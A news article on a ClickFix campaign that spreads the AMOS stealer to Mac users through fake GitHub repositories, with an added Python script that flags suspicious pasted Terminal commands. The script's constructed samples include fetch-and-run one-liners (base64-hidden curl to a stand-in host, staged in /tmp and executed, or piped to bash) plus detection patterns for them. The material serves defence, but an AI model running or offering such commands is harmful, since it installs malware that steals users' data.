Warning: Fake Software on GitHub Is Targeting Mac Users
Cybercriminals have launched a large-scale campaign against macOS users, disguising malware as popular applications. The alert comes from LastPass, which reported that its own product was among those impersonated. Distribution is carried out through fake GitHub repositories deliberately optimized for search engines, allowing them to rank prominently in Google and Bing results.
The attack relies on the ClickFix technique: the victim is told to paste a command into the Terminal, ostensibly to install the application. No vulnerability is exploited; the user runs the payload themselves. The command issues a curl request to an encoded (obfuscated) URL and drops an install.sh script into /tmp, which in turn installs the Atomic Stealer (AMOS) trojan. AMOS is sold as Malware-as-a-Service (MaaS) for about $1,000 per month; its core function is stealing data from infected devices, and its developers recently added a backdoor component that gives operators stealthy, persistent access to compromised systems.
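As an added example (not code from the article or from LastPass), the Python script below triages a pasted one-liner of the kind described above without executing any part of it: it flags output piped into a shell, a base64 decode step, and a file staged and run from /tmp, decodes base64 tokens to recover the URL they hide, and recurses when the decoded payload is itself a command. The sample commands, the example.invalid host and the file names are constructed for this example and are not indicators from the campaign.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Indicators of the ClickFix pattern described in the article: output piped into a
# shell, a base64 step that hides the real URL, and a script staged and run from /tmp.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|k|da)?sh\b")
DECODE_STEP = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
FETCH = re.compile(r"\b(?:curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"<>|&;)]+")
TMP_PATH = re.compile(r"/tmp/[\w.\-]+")
# A /tmp file run directly, via an interpreter, or made executable.
TMP_EXEC = re.compile(r"(?:\b(?:bash|sh|zsh|source|chmod\s+\+x)\s+|(?:^|&&|;|\|\|)\s*)(/tmp/[\w.\-]+)")
# A standalone run of base64 alphabet characters long enough to hide a URL.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


@dataclass
class Triage:
    command: str
    urls: list[str] = field(default_factory=list)      # every URL, including ones hidden in base64
    decoded: list[str] = field(default_factory=list)   # base64 tokens that decoded to text
    tmp_paths: list[str] = field(default_factory=list)
    flags: list[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        return "SUSPICIOUS" if self.flags else "no ClickFix indicators"


def _decode_printable(token: str):
    """Decode a base64 token to text, or return None if it is not really base64."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None


def triage(command: str, depth: int = 0) -> Triage:
    """Inspect a pasted one-liner statically; nothing in it is ever executed."""
    t = Triage(command)
    if PIPE_TO_SHELL.search(command):
        t.flags.append("command output is piped straight into a shell")
    if DECODE_STEP.search(command):
        t.flags.append("base64 decode step hides part of the command")
    if TMP_EXEC.search(command):
        t.flags.append("stages and runs a file from /tmp")
    t.urls.extend(URL.findall(command))
    t.tmp_paths.extend(dict.fromkeys(TMP_PATH.findall(command)))

    for m in B64_TOKEN.finditer(command):
        text = _decode_printable(m.group(0))
        if text is None:
            continue
        t.decoded.append(text)
        hidden = [u for u in URL.findall(text) if u not in t.urls]
        if hidden:
            t.flags.append("URL is only visible after base64 decoding")
            t.urls.extend(hidden)
        # The decoded payload may itself be a command: analyse it too (bounded depth).
        if depth < 2 and (FETCH.search(text) or PIPE_TO_SHELL.search(text)):
            inner = triage(text, depth + 1)
            t.flags.extend([f"decoded payload: {f}" for f in inner.flags])
            t.urls.extend([u for u in inner.urls if u not in t.urls])
            t.tmp_paths.extend([p for p in inner.tmp_paths if p not in t.tmp_paths])
    return t


# Constructed samples (not indicators from the campaign). The base64 blob in the
# first one decodes to the hypothetical URL https://example.invalid/install.sh.
SAMPLE_STAGED = (
    'curl -fsSL "$(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaW5zdGFsbC5zaA== | base64 -d)" '
    "-o /tmp/install.sh && chmod +x /tmp/install.sh && /tmp/install.sh"
)
# Whole command hidden in base64 and piped to bash; encoded here so the blob is exact.
SAMPLE_NESTED = ("echo " + base64.b64encode(b"curl -fsSL https://example.invalid/x.sh | bash").decode()
                 + " | base64 -d | bash")
SAMPLE_BENIGN = "git clone https://github.com/example/repo.git && cd repo && make"

if __name__ == "__main__":
    for cmd in (SAMPLE_STAGED, SAMPLE_NESTED, SAMPLE_BENIGN):
        r = triage(cmd)
        print(f"{r.verdict}: {cmd}")
        for f in r.flags:
            print("  -", f)
        if r.urls:
            print("  urls:", ", ".join(r.urls))
```

The base64 candidates are decoded with strict validation and kept only if they yield printable text, so ordinary URL path segments that happen to be long enough (such as the GitHub path in the benign sample) are rejected rather than reported. Recursion is capped at two levels, which covers the common "decode, then the decoded text curls and pipes" layering without looping on adversarial input.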
According to LastPass, attackers are not limiting themselves to a single brand. The list of impersonated programs exceeds 100, including well-known solutions such as 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. To evade takedowns, fraudsters create numerous fake GitHub accounts and duplicate repositories, each featuring a “Download” button that redirects to a secondary website hosting the terminal command instructions.
Such tactics against macOS are not entirely new. Past incidents included fake Booking.com apps and bogus “system repair” tools distributed via online ads. However, the current campaign is significantly broader in scope: automation enables criminals to swiftly launch new pages after old ones are blocked.
LastPass emphasized that it is actively monitoring the situation and submitting takedown requests to GitHub, though the threat persists due to the ease of generating new repositories.
Security experts stress that users should trust only official developer websites. If a vendor does not offer a macOS version of its product, any so-called "alternative" is almost certainly malicious. Even when legitimate macOS software exists, downloads must come from verified sources rather than obscure third-party sites; a page outside the vendor's own domain that asks you to paste a command into the Terminal to "install" the app is the ClickFix pattern itself.